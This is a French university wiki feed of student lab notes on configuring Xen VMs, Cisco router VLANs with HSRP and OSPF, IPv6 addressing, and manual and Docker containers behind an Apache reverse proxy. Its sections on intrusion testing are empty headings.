&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
Mise à disposition d'un réseau IPv4 routé : &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; dans le VLAN 110 de l'école&lt;br /&gt;
&lt;br /&gt;
Lors de la réalisation de ce TP, le réseau était déjà découpé en deux partie.&lt;br /&gt;
&lt;br /&gt;
La première pour les IMA2A5 : allant de &amp;lt;code&amp;gt;193.48.57.160/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.175/28&amp;lt;/code&amp;gt;&lt;br /&gt;
La seconde était encore inutilisée : Nous avions donc à disposition les adresses allant de &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.191/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec un masque &amp;lt;code&amp;gt;/28&amp;lt;/code&amp;gt; ('''240''') nous avions donc 16 adresses dans le réseau &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons donc établi avec le groupe routeur 2 (Binôme 11) le plan d'adressage suivant&lt;br /&gt;
&lt;br /&gt;
* .176 : adresse de réseau&lt;br /&gt;
* .177 à .187 : les adresses IP des machines virtuelles Xen&lt;br /&gt;
* .188 : adresse du '''Routeur 1'''&lt;br /&gt;
* .189 : adresse du '''Routeur 2'''&lt;br /&gt;
* .190 : adresse du '''Routeur Virtuel'''&lt;br /&gt;
* .191 : adresse de diffusion&lt;br /&gt;
&lt;br /&gt;
Nous avions également à utiliser un réseau IPv4 non routé (&amp;lt;code&amp;gt;10.60.0.0/16&amp;lt;/code&amp;gt;) où chaque binôme devait avoir un sous-réseau.&lt;br /&gt;
&lt;br /&gt;
Les IMA2A5 avaient choisi d'utiliser des réseau de la forme : &amp;lt;code&amp;gt;10.60.N.0/24&amp;lt;/code&amp;gt; où '''N''' est le numéro de binôme, variant de 1 à 5 dans leur cas.&lt;br /&gt;
&lt;br /&gt;
Nous avons repris cette idée en prenant la forme &amp;lt;code&amp;gt;10.60.10+N.0/24&amp;lt;/code&amp;gt; avec pour choix, en vue de la configuration des routeurs :&lt;br /&gt;
&lt;br /&gt;
* Adresse du routeur 1 : 10.60.11.252/24&lt;br /&gt;
* Adresse du routeur 2 : 10.60.11.253/24&lt;br /&gt;
* Adresse du routeur virtuel : 10.60.11.254/24&lt;br /&gt;
&lt;br /&gt;
Rappel du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
* [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5sc_2018/2019 IMA5sc 2018/19]&lt;br /&gt;
&lt;br /&gt;
==== 3.3 Le routage de sites (IPv4) - Routeur Cisco 3560 ====&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes chargés de la configuration du routeur 1, le Cisco 3560.&lt;br /&gt;
&lt;br /&gt;
Comme nous étions situés sur la Zabeth09, nous avons pu utiliser un câble muni d'un adaptateur pour relier en USB la Zabeth au port console du routeur.&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite utilisé &amp;lt;code&amp;gt;minicom -os&amp;lt;/code&amp;gt; en '''root''' avec les réglages suivants :&lt;br /&gt;
&lt;br /&gt;
* '''/dev/ttyUSB0'''&lt;br /&gt;
* '''9600 8N1'''&lt;br /&gt;
* Hardware Flow Control : '''No'''&lt;br /&gt;
&lt;br /&gt;
On arrive ensuite sur le routeur. '''Switch&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
Rappel des commandes Cisco utiles (ou [https://tvantroys.plil.fr/IMA4/network/ Cours de réseau IMA4]&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;enable&amp;lt;/code&amp;gt; : permet de passer en EXEC privilégié sur le Cisco&lt;br /&gt;
* &amp;lt;code&amp;gt;configure terminal&amp;lt;/code&amp;gt; : peut aussi être remplacé par &amp;lt;code&amp;gt;conf t&amp;lt;/code&amp;gt; pour passer en mode de configuration globale&lt;br /&gt;
* &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; : pour retourner à un niveau prédédent&lt;br /&gt;
* &amp;lt;code&amp;gt;write&amp;lt;/code&amp;gt; : au niveau privilégié de base, permet de sauvegarder la configuration&lt;br /&gt;
* &amp;lt;code&amp;gt;interface NOM_INTERFACE&amp;lt;/code&amp;gt; : pour configurer  une interface (peut aussi s'écrire &amp;lt;code&amp;gt;int NOM_INTERFACE&amp;lt;/code&amp;gt;)&lt;br /&gt;
* &amp;lt;code&amp;gt;?&amp;lt;/code&amp;gt; : pour afficher les commandes possibles au niveau actuel&lt;br /&gt;
&lt;br /&gt;
Dans cette partie on s'intéresse à la configuration des interfaces en IPv4 :&lt;br /&gt;
&lt;br /&gt;
Au niveau de l'architecture, nous voulons que le réseau soit redondant, ainsi il faut que les deux routeurs puissent effectuer le même travail mais pas en même temps.&lt;br /&gt;
&lt;br /&gt;
L'un des deux réalise le travail (il est prioritaire) et l'autre vérifie que le travail est effectué, en cas d'arrêt, il prend le relais.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, le groupe 11 (routeur 2) a décidé de mettre une priorité basse dans la configuration de leur routeur.&lt;br /&gt;
&lt;br /&gt;
Rappel : Le réseau s'organise sur plusieurs VLANs&lt;br /&gt;
&lt;br /&gt;
* VLAN 1 : Pour les autres composants tels que la borne wifi configurée par le groupe 1.&lt;br /&gt;
* VLAN 43 : Il s'agit du VLAN où sont les machines XEN IMA5. Les IMA2A5 avaient opté pour le VLAN 42.&lt;br /&gt;
* VLAN 131 : Le VLAN d'interconnexion de l'école. (SR52), les IMA2A5 utilisent le VLAN 130.&lt;br /&gt;
* VLAN 11 à 21 : Un VLAN par binôme, c'est dans ces VLAN que nous utiliserons les adresses de la forme '''10.60.10+N.X'''. Comme pour les adresses, nous avons opté pour des numéros de la forme 10+Numéro de groupe.&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 1 =====&lt;br /&gt;
&lt;br /&gt;
Il est juste question d'attribuer au routeur une adresse dans le vlan 1 pour la borne wifi&lt;br /&gt;
&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43 &lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On commence par supprimer l'interface (&amp;lt;code&amp;gt;no int vlan43&amp;lt;/code&amp;gt;) en cas de doute sur sa configuration puis on la recrée et on attribue au routeur une adresse IP (188 = routeur 1) dans le VLAN (190 = routeur virtuel).&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
* Remplacer &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN et &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification =====&lt;br /&gt;
&lt;br /&gt;
Pour tester on peut tenter de ping le routeur depuis une source exterieure ou alors utiliser un routeur pour ping l'autre.&lt;br /&gt;
&lt;br /&gt;
* Ping depuis une machine virtuelle vers '''193.48.57.188''' (routeur 1) &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping dionysos r1.png]]&lt;br /&gt;
&lt;br /&gt;
* Ping depuis le routeur 1 vers '''193.48.57.189''' (routeur 2)&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping r1 r2.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.4 Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous retournons dans la configuration des interfaces pour ajouter un routage via IPv6.&lt;br /&gt;
&lt;br /&gt;
Dans le sujet il est indiqué que les adresses disponibles se situent à partir de &amp;lt;code&amp;gt;2001:660:4401:60b0::/64&amp;lt;/code&amp;gt; mais les premières adresses étant prises par les IMA2A5 nous utiliserons les adresses en '''C0''' et plus plutôt qu'à partir '''B0'''&lt;br /&gt;
&lt;br /&gt;
* ajouter à la configuration globale &lt;br /&gt;
&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On supprime à nouveau l'interface (mais ce n'est pas nécessaire) pour y imposer la nouvelle configuration de l'interface&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
Remplacer &lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN &lt;br /&gt;
* &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
* &amp;lt;code&amp;gt;HH&amp;lt;/code&amp;gt; dans la partie IPv6 par '''C1''' à '''CB''' suivant le groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60HH::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60HH::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== 3.5 Interconnexion avec Internet IPv4 ====&lt;br /&gt;
&lt;br /&gt;
Comme les IMA2A5 utilisent déjà le VLAN130 ('''192.168.222.0/29''') nous utilisons le VLAN131 &amp;lt;code&amp;gt;192.168.222.8/29&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Configuration OSPF =====&lt;br /&gt;
&lt;br /&gt;
router ospf 1&lt;br /&gt;
 router-id 10.60.11.252&lt;br /&gt;
 log-adjacency-changes&lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
 redistribute connected subnets&lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==== 3.6 Interconnexion avec Internet IPv6 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== 3.7 Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49096</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49096"/>
				<updated>2018-12-21T15:21:04Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* Configuration du VLAN 131 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
